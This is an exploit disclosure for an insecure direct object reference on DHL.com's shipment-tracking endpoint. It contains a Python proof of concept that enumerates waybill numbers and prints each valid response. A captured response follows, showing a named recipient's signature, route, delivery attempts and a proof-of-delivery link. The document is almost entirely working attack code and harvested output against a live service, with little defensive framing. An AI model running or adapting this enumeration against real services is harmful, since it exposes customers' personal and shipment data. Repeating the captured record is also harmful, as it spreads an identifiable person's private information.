Exploit Title: DHL.com - Insecure Direct Object Reference (IDOR)
Exploit Author: Nir Yehoshua
Exploit Date: 2020-4-5
Link to vulnerable website: https://www.DHL.com
Category: Web Application
Details: An IDOR vulnerability discovered at the DHL.com website and can lead to sensitive information disclosure.
Proof of Concept (Python):
=============================
# DHL.com IDOR - By Nir Yehoshua
import requests
for Number in range(4357790500,4357790700):
URL = 'https://www.dhl.com/shipmentTracking?AWB=%d&countryCode=g0&languageCode=en&_=1' % Number
JsonResponse = requests.get(URL).content
if '404' in JsonResponse:
pass
else:
print JsonResponse
=============================
Example of a Valid Response:
{
"results" : [ {
"id" : "4357790500",
"label" : "Waybill",
"type" : "airwaybill",
"duplicate" : false,
"delivery" : {
"code" : "101",
"status" : "delivered"
},
"origin" : {
"value" : "HARRISBURG, PA - GAP - USA",
"label" : "Origin Service Area",
"url" : "http://www.dhl-usa.com/en/country_profile.html"
},
"destination" : {
"value" : "CITY OF LONDON - LONDON - UK",
"label" : "Destination Service Area",
"url" : "http://www.dhl.co.uk/en/country_profile.html"
},
"description" : "Signed for by: KRYSTAL HUR Tuesday, March 03, 2020 at 15:56",
"hasDuplicateShipment" : false,
"signature" : {
"link" : {
"url" : "https://webpod.dhl.com/webPOD/DHLePODRequest?hwb=dSr%2FLV2ZeScSG3VC9RfKCw%3D%3D&pudate=QDxjVknMdDhAOW9Lo2HVuw%3D%3D&appuid=ex5GbwXugFsa4OwbVVA2iA%3D%3D&language=en&country=G0",
"label" : "Get Proof of Delivery"
},
"type" : "epod",
"description" : "Tuesday, March 03, 2020 at 15:56",
"signatory" : "KRYSTAL HUR",
"label" : "Signed for by",
"help" : "help"
},
"pieces" : {
"value" : 1,
"label" : "Piece",
"showSummary" : true,
"pIds" : [ "JD014600007709654134" ]
},
"checkpoints" : [ {
"counter" : 26,
"description" : "Delivered - Signed for by: KRYSTAL HUR",
"time" : "15:56",
"date" : "Tuesday, March 03, 2020 ",
"location" : "LONDON "
}, {
"counter" : 25,
"description" : "Awaiting collection by recipient as requested",
"time" : "10:52",
"date" : "Thursday, February 27, 2020 ",
"location" : "CITY OF LONDON - UK"
}, {
"counter" : 24,
"description" : "With delivery courier",
"time" : "09:04",
"date" : "Thursday, February 27, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 23,
"description" : "Scheduled for delivery as agreed",
"time" : "17:00",
"date" : "Wednesday, February 26, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 22,
"description" : "Shipment on hold",
"time" : "09:46",
"date" : "Wednesday, February 26, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 21,
"description" : "Shipment on hold",
"time" : "19:45",
"date" : "Tuesday, February 25, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 20,
"description" : "Delivery attempted; recipient not home",
"time" : "18:20",
"date" : "Tuesday, February 25, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 19,
"description" : "With delivery courier",
"time" : "09:31",
"date" : "Tuesday, February 25, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 18,
"description" : "Delivery attempted; recipient not home",
"time" : "19:08",
"date" : "Monday, February 24, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 17,
"description" : "With delivery courier",
"time" : "09:47",
"date" : "Monday, February 24, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 16,
"description" : "Arrived at Delivery Facility in CITY OF LONDON - UK",
"time" : "06:11",
"date" : "Monday, February 24, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 15,
"description" : "Departed Facility in LONDON-HEATHROW - UK",
"time" : "04:29",
"date" : "Monday, February 24, 2020 ",
"location" : "LONDON-HEATHROW - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 14,
"description" : "Processed at LONDON-HEATHROW - UK",
"time" : "22:42",
"date" : "Sunday, February 23, 2020 ",
"location" : "LONDON-HEATHROW - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 13,
"description" : "Clearance processing complete at LONDON-HEATHROW - UK",
"time" : "22:32",
"date" : "Sunday, February 23, 2020 ",
"location" : "LONDON-HEATHROW - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 12,
"description" : "Arrived at Sort Facility LONDON-HEATHROW - UK",
"time" : "17:43",
"date" : "Sunday, February 23, 2020 ",
"location" : "LONDON-HEATHROW - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 11,
"description" : "Departed Facility in EAST MIDLANDS - UK",
"time" : "14:32",
"date" : "Sunday, February 23, 2020 ",
"location" : "EAST MIDLANDS - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 10,
"description" : "Transferred through EAST MIDLANDS - UK",
"time" : "14:32",
"date" : "Sunday, February 23, 2020 ",
"location" : "EAST MIDLANDS - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 9,
"description" : "Clearance processing complete at EAST MIDLANDS - UK",
"time" : "14:15",
"date" : "Sunday, February 23, 2020 ",
"location" : "EAST MIDLANDS - UK"
}, {
"counter" : 8,
"description" : "Shipment not arrived; customs status updated",
"time" : "00:03",
"date" : "Sunday, February 23, 2020 ",
"location" : "EAST MIDLANDS - UK"
}, {
"counter" : 7,
"description" : "Departed Facility in NEW YORK CITY GATEWAY - USA",
"time" : "16:39",
"date" : "Saturday, February 22, 2020 ",
"location" : "NEW YORK CITY GATEWAY, NY - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 6,
"description" : "Processed at NEW YORK CITY GATEWAY - USA",
"time" : "14:53",
"date" : "Saturday, February 22, 2020 ",
"location" : "NEW YORK CITY GATEWAY, NY - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 5,
"description" : "Processed at NEW YORK CITY GATEWAY - USA",
"time" : "01:33",
"date" : "Saturday, February 22, 2020 ",
"location" : "NEW YORK CITY GATEWAY, NY - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 4,
"description" : "Arrived at Sort Facility NEW YORK CITY GATEWAY - USA",
"time" : "01:14",
"date" : "Saturday, February 22, 2020 ",
"location" : "NEW YORK CITY GATEWAY, NY - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 3,
"description" : "Departed Facility in WEST PHILADELPHIA - USA",
"time" : "23:38",
"date" : "Friday, February 21, 2020 ",
"location" : "WEST PHILADELPHIA, PA - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 2,
"description" : "Processed at WEST PHILADELPHIA - USA",
"time" : "23:37",
"date" : "Friday, February 21, 2020 ",
"location" : "WEST PHILADELPHIA, PA - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 1,
"description" : "Shipment information received",
"time" : "09:37",
"date" : "Friday, February 21, 2020 ",
"location" : "HARRISBURG, PA - USA"
} ],
"checkpointLocationLabel" : "Location",
"checkpointTimeLabel" : "Time"
} ]
}